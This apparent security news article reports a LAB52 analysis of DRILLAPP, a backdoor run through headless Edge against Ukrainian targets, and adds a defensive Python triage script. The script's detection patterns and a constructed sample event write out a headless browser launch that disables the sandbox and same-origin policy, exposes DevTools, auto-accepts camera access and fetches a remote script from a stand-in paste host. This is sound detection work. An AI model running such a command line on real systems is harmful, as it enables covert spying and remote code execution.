A Spanish threat intelligence team has described a recent campaign that targets Ukrainian organizations and whose modus operandi points to actors with possible links to previously documented Russian groups. The analysis, published by LAB52, the threat intelligence team of S2 Grupo, names the malicious component DRILLAPP and dates the first observation to February 2026, although earlier traces go back to the end of January.
The most striking feature of this campaign is the use of the browser as the execution and persistence vector. Instead of dropping conventional executables, the attackers abuse a legitimate Edge installation, launching it in headless mode with parameters that disable its protections, to run obfuscated JavaScript hosted on public paste services such as Pastefy. With flags such as --no-sandbox (renderer sandbox off), --disable-web-security (same-origin policy off) or --use-fake-ui-for-media-stream (camera and microphone prompts auto-accepted), the browser process gains capabilities that are normally restricted: file system access, camera and microphone capture and screen recording, all without user interaction. For a general explanation of what running a browser in this mode means, see the entry on headless browsers.

The first observed vector combined Windows shortcut (.LNK) files with HTML Applications (HTA) that downloaded and ran the remote script. The shortcuts were copied into the Windows Startup folder so they would run again after a reboot. In a later iteration the operators switched to Control Panel modules, while keeping the infection chain essentially the same. The change was not only in transport: the backdoor itself evolved and began to offer more robust functions, such as recursive file enumeration, bulk uploads and arbitrary file download.
Technically, the attackers overcome the limitations of the JavaScript environment itself by using the Chrome DevTools Protocol (CDP), the internal protocol of Chromium-based browsers that, once exposed through the remote debugging parameter, allows actions that page JavaScript cannot perform on its own, including downloading files to disk. This reliance on CDP is a clear sign of how the browser's own surface is being exploited to bypass security restrictions designed precisely to prevent such abuse.
DRILLAPP operates as a lightweight backdoor that, besides managing files and talking to a command and control server, incorporates multimedia espionage capabilities: audio capture, camera images and screen capture. On first execution it collects a device "fingerprint" using browser fingerprinting techniques and sends it together with a country identifier inferred from the system time zone. The code contains an explicit list of time zones of interest, including Ukraine, the United Kingdom, Russia, the United States and several European and Asian countries; if none matches, it defaults to the United States.
To hide the real address of the control server, the attackers use paste sites as "dead drop resolvers" that return the WebSocket URL the malware uses to keep its channel open. LAB52 also documents an early variant that, instead of Pastefy, communicated with an apparently generic domain ("gnome[.]com"), suggesting experimentation and active development of the toolkit.
Using the browser as the vector has practical advantages for an attacker: browsers are common processes on any system, their presence raises no immediate suspicion and, when launched with certain parameters, they give direct access to sensitive resources that would otherwise require user interaction and explicit permissions. That makes the browser an attractive platform for covert evasion and exfiltration techniques.
What can an organization do to reduce the risk of such attacks? First, monitor for abnormal patterns such as Edge or Chrome instances launched with remote-debugging or sandbox-disabling parameters, and track changes to the Startup folders and the loading of Control Panel modules that have no administrative justification. Corporate browsing policies should restrict HTA execution (mshta.exe) and block or inspect outbound traffic to paste and dynamic-content services used as dead drops. Strict camera and microphone permission controls, together with EDR rules that flag browser processes opening unusual sockets or accessing the file system atypically, also shrink the attack surface.
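The following is an added example of the first recommendation, written for this article and not code from LAB52 or the campaign: it triages Sysmon-style process-creation records (image, command line, parent) and scores Chromium browsers started headless with the switches mentioned above, HTA hosts loading remote scripts, and Control Panel modules run from user-writable paths. The sample events, the paste URL and the host list are constructed; the assumption that Control Panel items run through rundll32 shell32.dll,Control_RunDLL is standard Windows behaviour rather than something the report states.

```python
"""Triage process-creation events for DRILLAPP-style browser abuse.

Added example (not LAB52's code). Sample events below are constructed.
Assumption: Control Panel modules (.cpl) are launched through
rundll32.exe shell32.dll,Control_RunDLL, the standard Windows mechanism.
"""
import shlex
from dataclasses import dataclass, field

BROWSERS = {"msedge.exe", "chrome.exe", "chromium.exe", "brave.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}

# Switches that turn off a protection the user would otherwise rely on
PROTECTION_OFF = {
    "--no-sandbox": "renderer sandbox disabled",
    "--disable-web-security": "same-origin policy disabled",
    "--use-fake-ui-for-media-stream": "camera/microphone prompt auto-accepted",
}
# Switches that expose the Chrome DevTools Protocol to another process
CDP_SWITCHES = {
    "--remote-debugging-port": "Chrome DevTools Protocol exposed on a TCP port",
    "--remote-debugging-pipe": "Chrome DevTools Protocol exposed over a pipe",
}


@dataclass
class ProcessEvent:
    image: str          # path of the new process
    command_line: str
    parent_image: str


@dataclass
class Finding:
    verdict: str                      # "benign", "suspicious" or "high"
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(command_line: str) -> list:
    # posix=False keeps Windows backslashes and quoted paths intact
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def switches(command_line: str) -> dict:
    """Map every --switch[=value] on the command line to its value ('' if none)."""
    out = {}
    for tok in tokens(command_line):
        if tok.startswith("--"):
            name, _, value = tok.partition("=")
            out[name.lower()] = value
    return out


def remote_urls(command_line: str) -> list:
    return [t for t in tokens(command_line) if t.lower().startswith(("http://", "https://"))]


def triage(ev: ProcessEvent) -> Finding:
    image, parent = basename(ev.image), basename(ev.parent_image)
    f = Finding("benign")
    if image in BROWSERS:
        sw = switches(ev.command_line)
        headless = "--headless" in sw
        off = [desc for name, desc in PROTECTION_OFF.items() if name in sw]
        cdp = [desc for name, desc in CDP_SWITCHES.items() if name in sw]
        f.reasons += off + cdp
        if headless:
            f.reasons.append("headless (no window the user could notice)")
        if remote_urls(ev.command_line):
            f.reasons.append("loads a remote URL straight from the command line")
        if parent in SCRIPT_HOSTS:
            f.reasons.append(f"spawned by script host {parent}")
        if off and headless:
            f.verdict = "high"        # hidden browser with its protections off
        elif off or cdp or (headless and remote_urls(ev.command_line)):
            f.verdict = "suspicious"
    elif image == "mshta.exe" and remote_urls(ev.command_line):
        f.verdict, f.reasons = "high", ["HTA host loading a remote script"]
    elif image == "rundll32.exe" and "control_rundll" in ev.command_line.lower():
        for tok in tokens(ev.command_line):
            if tok.lower().endswith(".cpl") and "\\windows\\" not in tok.lower():
                f.verdict = "suspicious"
                f.reasons.append(f"Control Panel module from a non-Windows path: {tok}")
    return f


EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_EVENTS = [  # constructed for this example, not campaign telemetry
    ProcessEvent(EDGE, f'"{EDGE}" --headless=new --no-sandbox --disable-web-security '
                 "--use-fake-ui-for-media-stream --remote-debugging-port=9222 "
                 "https://paste.example/raw/abc123", r"C:\Windows\System32\mshta.exe"),
    ProcessEvent(EDGE, f'"{EDGE}" --profile-directory=Default', r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL '
                 r'"C:\Users\u\AppData\Roaming\sys.cpl"', r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        res = triage(ev)
        print(f"{res.verdict:10} {basename(ev.image)}  {'; '.join(res.reasons)}")
```

The verdicts deliberately separate "protections off" from "CDP exposed": a developer running browser automation will trip the CDP check on a workstation, so that tier is tuned per fleet, while a headless browser with --no-sandbox and --use-fake-ui-for-media-stream spawned by mshta.exe has no legitimate reading and goes straight to the top tier.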

For those who want the full technical explanation and the IOCs, the original LAB52 report is the direct reference for this campaign: DRILLAPP - LAB52 report. Where the campaign's lures reference civil initiatives or aid organizations, compare links and pages against official sources, for example the Come Back Alive Foundation (savelife.in.ua) or legitimate services such as Starlink, to avoid landing on fraudulent pages.
More broadly, the incident is a reminder that tools used every day in ordinary infrastructure, such as browsers, paste services or debugging features, become weapons when they are not monitored and configured with security in mind. The threat is both technical and social: it combines social engineering (thematic lures) with abuse of legitimate software capabilities, and its effectiveness lies at that intersection.
The final recommendation for IT managers and users is to keep a proactive posture: update and harden browsers and execution policies, audit processes that start at boot, and have detection capabilities that can tell an ordinary browser process from one behaving as a collection and exfiltration agent. The LAB52 publication provides the details teams need to identify specific indicators and adjust the controls in their environments.